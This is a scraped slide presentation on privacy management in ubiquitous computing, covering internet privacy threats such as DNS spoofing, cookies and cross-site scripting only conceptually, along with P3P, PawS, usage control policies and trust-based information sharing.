Privacy Management in Ubiquitous Computing Environment Jin Zhou Ho Geun An Priyanka Vanjani Kwane E. Welcher.

Slides:



Advertisements
Similar presentations
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Advertisements

Hart District Acceptable Use Policy Acceptable Use Policy.
Working with the Internet
Building web applications on top of encrypted data using Mylar Presented by Tenglu Liang Tai Liu.
Identity Management Based on P3P Authors: Oliver Berthold and Marit Kohntopp P3P = Platform for Privacy Preferences Project.
Minding Your Own Business The Platform for Privacy Preferences Project and Privacy Minder Lorrie Faith Cranor AT&T Labs-Research
System and Network Security Practices COEN 351 E-Commerce Security.
Threats To A Computer Network
Web App Development with ASP.NET. Introduction In this chapter, we introduce web-app development with Microsoft’s ASP.NET technology. Web-based apps create.
Using Internet Information Server And Microsoft ® Internet Explorer To Implement Security On The Intranet HTTP.
CSE 4482, 2009 Session 21 Personal Information Protection and Electronic Documents Act Payment Card Industry standard Web Trust Sys Trust.
SESSION 9 THE INTERNET AND THE NEW INFORMATION NEW INFORMATIONTECHNOLOGYINFRASTRUCTURE.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
Chapter 9 Information Systems Controls for System Reliability— Part 2: Confidentiality and Privacy Copyright © 2012 Pearson Education, Inc. publishing.
1 Web Content Delivery Reading: Section and COS 461: Computer Networks Spring 2007 (MW 1:30-2:50 in Friend 004) Ioannis Avramopoulos Instructor:
Web Programming Language Dr. Ken Cosh Week 1 (Introduction)
Norman SecureSurf Protect your users when surfing the Internet.
Automated Tracking of Online Service Policies J. Trent Adams 1 Kevin Bauer 2 Asa Hardcastle 3 Dirk Grunwald 2 Douglas Sicker 2 1 The Internet Society 2.
D ATABASE S ECURITY Proposed by Abdulrahman Aldekhelallah University of Scranton – CS521 Spring2015.
11 SECURING INTERNET MESSAGING Chapter 9. Chapter 9: SECURING INTERNET MESSAGING2 CHAPTER OBJECTIVES  Explain basic concepts of Internet messaging. 
INTRODUCTION TO WEB DATABASE PROGRAMMING
The World-Wide Web. Why we care? How much of your personal info was released to the Internet each time you view a Web page? How much of your personal.
IT 210 The Internet & World Wide Web introduction.
Data Security.
Copyright © cs-tutorial.com. Introduction to Web Development In 1990 and 1991,Tim Berners-Lee created the World Wide Web at the European Laboratory for.
Prevent Cross-Site Scripting (XSS) attack
Direct and Online Marketing: The New Marketing Model
Chapter 16 The World Wide Web Chapter Goals Compare and contrast the Internet and the World Wide Web Describe general Web processing Describe several.
P3P A New Standard in Online Privacy Overview and Demos from Summer 2000.
About Dynamic Sites (Front End / Back End Implementations) by Janssen & Associates Affordable Website Solutions for Individuals and Small Businesses.
The Internet in Education Objectives Introduction Overview –The World Wide Web –Web Page v. Web Site v. Portal Unique and Compelling Characteristics Navigation.
Adapted from Computer Concepts, New Perspectives, Thompson Course Technology EDW 647: The Internet Dr. Roger Webster & Dr. Nazli Mollah 24 Cookies: What.
Csci5233 Computer Security1 Bishop: Chapter 27 System Security.
Enabling Embedded Systems to access Internet Resources.
Virtual Business CREATING A WEB PRESENCE Copyright © Texas Education Agency, All rights reserved.
Computer & Network Security
3-Protecting Systems Dr. John P. Abraham Professor UTPA.
Privacy, P3P and Internet Explorer 6 P3P Briefing – 11/16/01.
1 Internet Browsing Vulnerabilities and Security ECE4112 Final Lab Ye Yan Frank Park Scott Kim Neil Joshi.
1 WS-Privacy Paul Bui Ryan Dickey. 2 Agenda  WS-Privacy  Introduction to P3P  How P3P Works  P3P Details  A P3P Scenario  Conclusion  References.
Chapter 8 Cookies And Security JavaScript, Third Edition.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
CSCE 201 Web Browser Security Fall CSCE Farkas2 Web Evolution Web Evolution Past: Human usage – HTTP – Static Web pages (HTML) Current: Human.
12 Developing a Web Site Section 12.1 Discuss the functions of a Web site Compare and contrast style sheets Apply cascading style sheets (CSS) to a Web.
Customer Interface for wuw.com 1.Context. Customer Interface for wuw.com 2. Content Our web-site can be classified as an service-dominant website. 3.
NETWORK HARDWARE AND SOFTWARE MR ROSS UNIT 3 IT APPLICATIONS.
U.S. Department of Commerce Web Advisory Group Minding Your Own Business The Platform for Privacy Preferences Project.
Lecture 16 Page 1 CS 236 Online Web Security CS 236 On-Line MS Program Networks and Systems Security Peter Reiher.
COSC 513 Operating Systems Project Presentation: Internet Security Instructor: Dr. Anvari Student: Ying Zhou Spring 2003.
Approximate Information Flows: Socially-based Modeling of Privacy in Ubiquitous Computing Xiaodong Jiang Jason I. Hong James A. Landay G r o u p f o r.
Chapter 12: How Private are Web Interactions?. Why we care? How much of your personal info was released to the Internet each time you view a Web page?
Organisations and Data Management 1 Data Collection: Why organisations & individuals acquire data & supply data via websites 2Techniques used by organisations.
Web Server.
WHAT IS E-COMMERCE? E-COMMERCE is a online service that helps the seller/buyer complete their transaction through a secure server. Throughout the past.
ASP-2-1 SERVER AND CLIENT SIDE SCRITPING Colorado Technical University IT420 Tim Peterson.
1 Law, Ethical Impacts, and Internet Security. 2 Legal Issues vs. Ethical Issues Ethics — the branch of philosophy that deals with what is considered.
Introduction Web analysis includes the study of users’ behavior on the web Traffic analysis – Usage analysis Behavior at particular website or across.
Unit 2 Personal Cyber Security and Social Engineering Part 2.
Windows Vista Configuration MCTS : Internet Explorer 7.0.
Web Security (cont.) 1. Referral issues r HTTP referer (originally referrer) – HTTP header that designates calling resource  Page on which a link is.
Web Programming Language
World Wide Web policy.
Database Driven Websites
What is Cookie? Cookie is small information stored in text file on user’s hard drive by web server. This information is later used by web browser to retrieve.
Unit# 5: Internet and Worldwide Web
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems
Cross Site Request Forgery (CSRF)
Presentation transcript:

Privacy Management in Ubiquitous Computing Environment Jin Zhou Ho Geun An Priyanka Vanjani Kwane E. Welcher

Summary Introduction (Jin) Internet Privacy (Ho An) Privacy in E-Commerce (Priyanka) Privacy in Ubiquitous Computing (Jin) Policy-Based Control (Kwane) Trust and Reputation (Jin) Conclusion (Jin)

Introduction Ubiquitous Computing promises a world where computational artifacts embedded in the environment will continuously sense our activities and provide services based on what is sensed It is thought of third wave in computing and just beginning

Scenario

Properties of Ubicomp UbiquityInvisibilitySensing Memory Amplification

Privacy Problems

Example Scenario Alice is visiting a city Use Bob’s location service Alice’s location is stored in Bob’s Server Bob may sell Alice’s information to Carol

Fair Information Practices Notice/AwarenessChoice/ConsentAccess/ParticipationIntegrity/SecurityEnforcement/Redress

Internet Internet is one of the biggest parts of ubiquitous computing environment. Based on End User Centric Architecture Benefits: Flexibility / Generality / Openness Flexibility / Generality / OpennessDisadvantages: End user care about the privacy protection End user care about the privacy protection the place where privacy violations occur most often today. the place where privacy violations occur most often today.

Personal Information on Internet Medium Web site / / IM / Chat room / bulletin board / p2p network / voice / video communication Web site / / IM / Chat room / bulletin board / p2p network / voice / video communication Personal Information Name / Address / SSN /Credit Card Number / User behavior Name / Address / SSN /Credit Card Number / User behavior

Threats Four factors make data collector much easier to gain personal information: In order to reach public, one must advertise advertise use well-known protocols and standards use well-known protocols and standards reveal one’s content reveal one’s content accept that one may come under the scrutiny of the authorities accept that one may come under the scrutiny of the authorities

Threats The widely used protocols (e.g. TCP / IP / HTTP / DNS) and applications do not support any kind of protection for privacy. By using these factors, data collectors are gathering personal information over the network without notice and consent. There are several data storages/flows on network that contains personal information and being targeted by data collectors. DNS / URL / Cookie / Scripting DNS / URL / Cookie / Scripting

DNS Server A DNS server resolves the host names found in Uniform Resource Locators (URL) into a numeric Internet address [RFC1035] Since there is no assurance in the protocol that replies from DNS server are genuine and not have been tampered with, DNS spoofing would deceive users and extract sensitive information. Structural remedies for the DNS vulnerabilities are available but not widely deployed. The Domain Name System Security Extensions [RFC2065] The Domain Name System Security Extensions [RFC2065]

URL Leak URL “ &form_id=xxx&pass=xxx” contains user ID and password. There are many ways that referenced URLs leak: History / referrer / logs History / referrer / logsSolution HTTPS HTTPS

Cookie Exposure Cookie is a message given to web browser by a web server. Main purpose of cookie is to identify users and possibly prepare customized WebPages for them. Main purpose of cookie is to identify users and possibly prepare customized WebPages for them. Cookie is used for basically two ways: tracking users and authenticating users. Cookie is used for basically two ways: tracking users and authenticating users. Unfortunately, there is no standard mechanism to establish the integrity of a cookie returned by a browser Best defense is to avoid shopping online or registering with online services that use unsafe cookie-based authentication.

Recommends [RFC2964] recommends proper use of cookie: 1. the user is aware that cookie is being maintained and consent to it. 2. The user has the ability to delete the cookie associated with such a session at any time. 3. The information obtained through the cookies is not disclosed to other parties without the user’s explicit consent. 4. Session information itself cannot contain sensitive information and cannot be used to obtain sensitive information.

Cross Site Scripting (CSS) CSS is a type of computer security vulnerability typically found in web application which allows malicious web users to inject client side script (Javascript or HTML) or ActiveX controls into the web pages, messages, instant messages, newsgroup posting, or various other media. Victim users may unintentionally execute the script without any notice. A CSS vulnerability could potentially be used to collect HTTP Cookies or the URL history and disseminate the data to an unauthorized party.

Prevent CSS Web administrator must filter a user-supplied data: All non-alphanumeric client-supplied data (possibly contains malicious script) should be converted to HTML character entities before being re-displayed to other clients. All non-alphanumeric client-supplied data (possibly contains malicious script) should be converted to HTML character entities before being re-displayed to other clients. For end users, the most effective way to prevent CSS attacks is to disable all scripting languages in their web browsers. For end users, the most effective way to prevent CSS attacks is to disable all scripting languages in their web browsers. They should be careful to click links on untrusted web pages or s. They should be careful to click links on untrusted web pages or s. Also they should not install any ActiveX controls from untrusted web sites. Also they should not install any ActiveX controls from untrusted web sites.

Addressing Privacy in E- Commerce E-Commerce: Business conducted over the internet using any of the applications that rely on internet , Web Services, Online Shopping

Data Implicit: Personalization is gathered from information inferred from a user. Explicit: Requires demographics, rating or other user information provided explicitly by the user.

Privacy Risks Users fear that their information might be shared with other organizations and/or companies. Fear of undesired marketing. Users are concerned about how the information they have provided would be used. Risk of a website not being run by a trusted organization and the information stored in their database. Information might be distributed amongst other unwanted websites, or may be used by other organizations Fear of online activities being tracked

User Concerns Most of the users do not care much about factors like: If a site has privacy policy posted If a site has privacy policy posted if the site has a data retention policy if the site has a data retention policy if the site has a privacy seal if the site has a privacy seal This is because hey are not well aware of the importance of the above factors

Protecting Privacy P3P One of the solutions in protecting privacy as far as E-Commerce is concerned Enables websites to express their privacy practices in a standard format which is convenient for user agents to retrieve and interpret.

HTTP Transaction with P3P added

Summary of P3P P3P is not an "Enforcement Mechanism" Facilitates better communication P3P Version 1.0: Goal of the specification: To make user agents aware of the practices that websites follow to collect data.

TRUSTe TRUSTe: Certifies, Monitors a websites privacy policies, policies and is also aimed towards resolving consumer privacy problems. TRUSTe developed the first online privacy seal program the TRUSTe Watchdog—an alternative dispute resolution mechanism that allows you to submit any privacy violations by an accredited site directly to TRUSTe via the Web.

Conclusion of E-Commerce Privacy Users nowadays have strong opinion regarding privacy online and they tend to make their own assumptions about the data collection and the results turn out to be quite unfavorable. It is vital to have more concrete and full-proof data nowadays regarding E-Commerce and privacy technologies in order to improve and win over user‘s trust and expectations.

Privacy in Ubicomp Environment Principle of Minimum Asymmetry Anonymization and Pseudonymization P3PPawSWearable Other Mechanisms

Principle of Asymmetry Negative externalities are often much harder to overcome in environments with significant asymmetry in both information and power between different parties. Principle of Minimum Asymmetry Decreasing the flow of information from data owners to data collectors and users Decreasing the flow of information from data owners to data collectors and users Increasing the flow of information from data collectors and users back to data owners Increasing the flow of information from data collectors and users back to data owners

Principle of Minimum Asymmetry

Approximate Information Flow Information Spaces Storage perspective Storage perspective Data Lifecycle Dataflow perspective Dataflow perspective Themes for minimizing Asymmetry End-user perspective End-user perspective

Information Spaces Boundaries: Physical Social Activity-based Properties: Lifetime Accuracy Confidence Operations: Addition/Deletion/Update Authorization/Revocation Promotion/Demotion Composition/Decompostion Fusion/Inference

Data Lifecyle CollectionAccess Second Use

Themes for Minimizing Asymmetry PreventionAvoidanceDetection

Design Space

Anonymization and Pseudonymization Anonymity precludes association of data or a transaction with a particular person. However, services which require presence of users are not possible with anonymity, in that case, pseudonymity is required. With user selected pseudonyms, users can interact with the environment in an anonymous way by having a pseudo identity. Nevertheless, pseudonymity can be compromised at times as the user is physically present there and be identified at times.

P3P A framework for standardized, machine readable privacy policies. Relieve the problem of time consuming process of reading policy. Enabled web browser can decide what to do by comparing this policy with the user's stored preferences. An XML file or in the HTTP header

An Example P3P File

Main Content of a Policy which information the server stores: which kind of information is collected (identifying or not); which kind of information is collected (identifying or not); which particular information is collected (IP number, address, name, etc.); which particular information is collected (IP number, address, name, etc.); use of the collected information: how this information is used (for regular navigation, tracking, personalization, telemarketing, etc.); how this information is used (for regular navigation, tracking, personalization, telemarketing, etc.); who will receive this information (only the current company, third party, etc.); who will receive this information (only the current company, third party, etc.); permanence and visibility: how long information is stored; how long information is stored; whether and how the user can access the stored information (read-only, optin, optout). whether and how the user can access the stored information (read-only, optin, optout).

Privacy Awareness System (PawS) Based on Fair Information Practices Mainly focuses on four principles: Notice Notice Policy announcement mechanisms Choice and Consent Choice and Consent Machine readable policies Proximity and locality Proximity and locality Access restriction based on location. Access and recourse Access and recourse Privacy proxies / privacy-aware databases

Overview of PawS

Wearable Instead of putting sensors and cameras in the room put them on the person. Suited to providing privacy and personalization. Have trouble with localized information, localized control and resource managemen

Other Approaches Location privacy policy Individual should be able to adjust the accuracy of his location, identity, time and speed and therefore have the power to enforce the need-to-know principle Individual should be able to adjust the accuracy of his location, identity, time and speed and therefore have the power to enforce the need-to-know principle Privacy Mirror provides feedback to end-users, showing them what information is being collected, and what information has been accessed and by whom. provides feedback to end-users, showing them what information is being collected, and what information has been accessed and by whom.

Policy Based Privacy

Personal Privacy Policies Policies defined Personal privacy policy defined Proposed personal privacy model

Personal Privacy Policy Model

Personal Privacy Policy Content Model Code for the Protection of Personal Information Privacy risk analysis questions

Model Code for the Protection of Personal Information 10 Principles Accountability Identifying Purpose Consent Limiting Collection Limiting Use, Disclosure, Retention

Model Code for the Protection of Personal Information 10 Principles AccuracySafeguardsOpenness Individual Access Challenging Compliance

Personal Privacy Policy Sample

Usage Control Policies Usage control policy defined Usage control policy goal

Usage Control Policy Concept

Usage Control Policy Components RequirementsObligations Controllable Controllable Observable Observable Compensation Actions

Usage Control Policy Components High-level policies Low-level policies

Usage Control Policy Process

Privacy Policy Discussion Personal Privacy Policy + Usage Control Policy + Technological Solutions = Enhanced Privacy in UBICOMP

Trust and Reputation Based Control People use trust and reputation to manage their privacy. Not all people are untrustworthy. Not all people are untrustworthy. Some have higher reputation, someone we trust more and to whom we are willing to give more privacy information. Some have higher reputation, someone we trust more and to whom we are willing to give more privacy information. trust networks and a reputation system to help users manage how, when, and where they share their personal information.

Advantages Policy based mechanism such as P3P and pawS assume that the user maintains only one privacy policy and this policy is applicable to all entities. Two advantages Adaptivity Adaptivity Flexibility Flexibility

Conclusion Fair Information Practices should be served as guidelines for designing a ubicomp system. Internet vulnerabilities should also be considered. Minimizing Asymmetry. Machine readable policies. Trust and reputation based system for information sharing.

Questions?